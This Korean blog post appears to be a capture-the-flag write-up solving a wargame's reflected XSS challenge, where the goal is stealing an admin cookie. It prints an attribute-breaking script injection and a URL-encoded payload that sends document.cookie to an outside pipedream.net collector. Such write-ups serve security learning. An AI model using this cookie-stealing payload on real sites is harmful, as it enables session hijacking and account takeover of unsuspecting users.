목표: 관리자의 쿠키를 탈취하라!
XSS 3 사이트에 들어왔습니다.
일단 차근차근 마이페이지부터 들어가보겠습니다.
주소창의 user 라는 변수를 GET 방식으로 보내주는것을 보고 변수값을 james 라고 바꿔서 보내주자 입력한 값에 따라 페이지에 출력되는 값이 바뀌는것을 확인하였습니다.
링크를 통해 페이지 출력을 바꾼다? => Reflectd XSS
http://ctf.segfaulthub.com:4343/xss_3/mypage.php?user=test | http://ctf.segfaulthub.com:4343/xss_3/mypage.php?user=james |
<POC 코드 실행을 위한 Burp Suite 분석>
보시면 james 라는 값이 응답에 placeholder="james" 라는 코드안에 들어가는것을 보실수 있습니다.
그러면 user="><script>alert(1)</script> // 이라고 해서 스크립트가 삽입되는지 확인해보겠습니다.
입력값 : user="><script>alert(1)</script> // |
의도한 대로 스크립트 코드가 잘 삽입되어 POC 코드가 동작한 것을 확인할 수 있습니다.
이제 쿠키탈취 코드를 삽입해주겠습니다.
입력값: user="><script>var%20data=document.cookie;%20var%20i=new%20Image();%20i.src="https://encxlimxsq6z.x.pipedream.net?cookie="%2Bdata;</script>// |
값이 무사히 잘 들어갔고 쿠키값 또한 잘 전달되는 것으로 확인되었습니다.
그러면 관리자 컴퓨터가 제가 보내준 링크로 접속을 했다고 가정하고 쿠키가 들어오는지 확인하겠습니다.
관리자의 컴퓨터로 제가 보내준 링크의 접속을 해봅니다.
쿠키값이었던 FLAG가 잘 전달된 것을 확인하실수 있습니다!
긴 글 읽어주셔서 감사합니다!
'워게임 문제풀이 > Segfault' 카테고리의 다른 글
<Segfault> 워게임 문제풀이 [XSS 5](feat.자기반성) (0) | 2024.07.01 |
---|---|
<Segfault> 워게임 문제풀이 [XSS 4] (0) | 2024.07.01 |
<Segfault> 워게임 문제풀이 [XSS 2] (0) | 2024.06.30 |
<Segfault> 워게임 문제풀이 [XSS 1] (0) | 2024.06.26 |
<Segfault> 워게임 문제풀이 [7편]-Blind SQL Injection (0) | 2024.05.31 |